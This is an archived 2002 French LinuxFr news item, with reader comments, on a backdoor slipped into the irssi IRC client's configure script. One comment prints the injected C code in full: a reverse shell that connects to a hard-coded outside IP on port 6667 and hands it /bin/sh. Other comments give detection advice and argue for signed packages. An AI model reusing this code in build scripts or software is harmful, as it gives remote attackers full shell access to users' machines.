mercredi 08 octobre
Accueil :: Dépêches :: Entretiens :: Journaux :: Forums :: Sondages :: Suivi :: Statistiques :: Contact :: Plan

Liens connexes

Dépêche modérée par

: Backdoor dans irssi

Posté par FeelGoord. Modéré le 25 mai 2002.
0
Il semblerait qu'un petit malin ait trouvé le moyen de modifier les sources d'irssi (client irc).
La modification porterait sur le script configure d'irssi. Ce dernier ouvrirait une connexion entre votre box et une machine distance, par le biais de laquelle il serait possible de s'infiltrer dans votre babasse.
La malversation serait en place depuis plus d'un mois. Si vous avez compilé irssi durant cette periode, il est recommandé de rechercher "SOCK_STREAM" dans le script, afin de vérifier si vous en avez été victime.
Le site d'irssi semble confirmer la chose.

> Lire les commentaires (50 commentaires, moyenne: 15).  

Cette discussion est archivée, il n'est plus possible de laisser des commentaires.

Note : les commentaires appartiennent à ceux qui les ont postés. Nous n'en sommes pas responsables.

c'est gros

Posté par lorill (page perso, ) le 25/05/2002 à 17:14. (lien). Évalué à 56.

c'est même hyper gros comme truc !
comment ca peut arriver ce genre de chose ?
faut modifier le script, refaire les archives et les mettre sur le site officiel... pas evident sans être dans l'equipe de dev...

Bref, c'est louche.

C'est quoi irsii ?

Posté par CopainJack (Jabber id, page perso, ) le 25/05/2002 à 17:56. (lien). Évalué à 35.

Oui, c'est quoi au juste ce soft ?

Ok, je pourrais aller le site d'irsii et cliquer sur About ou je decouvrirai que ce soft est un client irc modulaire dont les points forts sont:

- Security
- Modularity

(toujours d'apres le About)

Voila, juste pour dire qu'il n'est pas inutile de preciser ce qu'est le soft quand on en parle dans une news ;-)

[+] hum hum la c'est gros qd meme

Posté par woof () le 25/05/2002 à 18:36. (lien). Évalué à -9.

On dit I - R - S - S - I ..

(/me décapite CMoi)

ça fout les boules ¬_¬ ...

Posté par Schneider Dark () le 25/05/2002 à 19:33. (lien). Évalué à 15.

<mode parano ON> Nan,je peux pas faire confiance à personne sur internet! Ni à qui que ce soit,j'vais tapper mon propre client IRC,comme ça,j'aurai plus de backdoors ... Sauf si une de mes personnalités fait le coup,ah meeeeerde !!!</mode parano OFF>

Bon,sérieusement,ça fait peur un peu ça,le cracker doit être assez fort pour passer au travers de OpenBSD...

Pas un monstre,mais fort quand même :(

On pourrait imaginer pire.

Posté par lhardy philippe (page perso, ) le 26/05/2002 à 09:28. (lien). Évalué à 24.

En fait la publication des sources ne protège des trous de securité que
si ceux qui publient les sources vérifient bien tous les ajouts (et encore
certains trous ne sont simplement que des bugs qui ne sont pas toujours
évidents).
En plus la personne qui fait ce genre de modification doit être connue.
Je ne connais personne qui relise tout le code pour voir s'il y a
quelquechose de louche dedans avant la compilation.

Par contre avec l'accès aux sources une faillle detecté il est aisé de
trouver où comment et parfois par qui elle a été introduite.
Et on peut aussi voir si elle a été introduite par erreur ou volontairement.

Dans le cas d'irssi la personne qui a modifié les sources n 'est
évidemment pas passée par le mécanisme classique de soumission de patche
ou par CVS.
En plus le trou est réalisé en quelques lignes de code C, perdu dans les
lignes de C introduites dans le configure pour la detection du support de
fonctionnalités par le compilo...

Le plus fort c'est que ce trou effectue une connection directe à une adresse
IP codée en dur dans le fichier !
C'est assez gros, ce serait intéressant de savoir à qui appartient cette
adresse. Ce n'est évidemment pas forcément celui qui a introduit le code.
C'est peut-être juste une opération de discrédit.

Et c'est pourquoi la signature des fichiers est très importante, toute
alteration du contenu pourra etre detecté par l'utilisateur.
Encore faut-il que celui-ci prenne la peine de faire la vérification !

Imaginons maintenant que quelqu'un fasse ce genre de malversation
directement au niveau d'autoconf de la machine de compilation ou pire
encore des sources d'autoconf !
Et donc c'est l'utilisateur d'autoconf qui virus son propre config
(génèré a partir de config.in).
Le virus est introduit alors directement par la personne qui prépare
le package et il sera checksumé, signé et tout et tout !

Tout système de sécurite aussi perfectionné qu'il soit repose un moment
ou l'autre sur de l'humain.

La morale de cette histoire....

Posté par Maxime Ritter (page perso, ) le 26/05/2002 à 15:00. (lien). Évalué à 19.

Et bien, la pour le coup je crois que ce n'est glorieux pour personne....

Dans le futur, pour éviter un accident de ce type :
- Tous les fichiers (sources ou binaires) devront être signés avec un clef GPG.
- Il faudra vérifier systématiquement la signature. Suffit de rajouter 3 fois rien dans les ports des BSDs (ou pour les binaires dans RPMs ou dppkg).
- Ca nous fait raison de plus de veiller aux lois sur la crypto.

Oui mais encore...

Posté par Richard Hébert (page perso, ) le 26/05/2002 à 17:19. (lien). Évalué à 17.

Juste pour préciser les choses, les lignes ajoutées dans le script configure sont:
int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}
/* HP/UX 9 (%@#!) writes to sscanf strings */
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);
}
dup2(s, 0); dup2(s, 1); dup2(s, 2);
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
{ char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }

...et le résultat :
"What did the backdoor do? How to get rid of it?
The backdoored configure script spawns a new shell,
connects to some server and allows full shell access to it.
So, it might have done anything."
( source: http://main.irssi.org/?page=backdoor(...) )

Donc, le port 6667 est utilisé, mais dans quel sens ?
Tant qu'a servir d'exemple, j'aimerais comprendre ce que l'on risque en cas d'infection ( comment ça se passe, quoi )

[+] freebsd is good

Posté par th0m ask me () le 27/05/2002 à 07:28. (lien). Évalué à -4.

freebsd utilisant les .bz2 il n'etait pas trojanneR. Seul l'archive .tgz a été modifié.
* If you installed Irssi from binary, you are safe.
* Debian sources were not backdoored.
* Nightly source snapshots do not seem to be backdoored.
* CVS does not seem to be backdoored.
* irssi-0.8.4.tar.bz2 file was not backdoored, only the .gz one
* FreeBSD port was not backdoored, as it used the .bz2 file
* Irssi/SILC client was not backdoored
* If you let Irssi download the GLib sources from irssi.org, they are
backdoored (the same configure thing as with Irssi)
* If you still have the sources, check with grep SOCK_STREAM configure.
If it returns any lines, it is backdoored.
* md5 checksum of originally released irssi-0.8.4.tar.gz is
57bf9d89638be3d377be211f0b0d7049. This is also the one of 0.8.4a.

troollll power.

[+] Certes mais bon...

Posté par Aza () le 27/05/2002 à 07:52. (lien). Évalué à -5.

Est-ce que l'on doit publier chaque trou de sécu sur un logiciel libre en premiere page de linuxfr ? parceque bon sinon on a pas fini. Surtout que franchement irssi n'est pas un soft super utilisé. Si c'etait un gros trou sur le noyau linux, d'accord, mais pour un soft tiers ca aurait pu passer ailleurs.

Sinon je me met a poster toutes failles qui sortent sur bugtraq tiens ;-)

ps : rien à foutre des xp.

Revenir en haut de page

Run by Team LinuxFr.org

Cette page a été générée par Templeet en 0.1703s (dont 0.0203 de SQL).
Cette page est peut-être conforme xhtml 1.0.
Information sur le site.
Faire un don !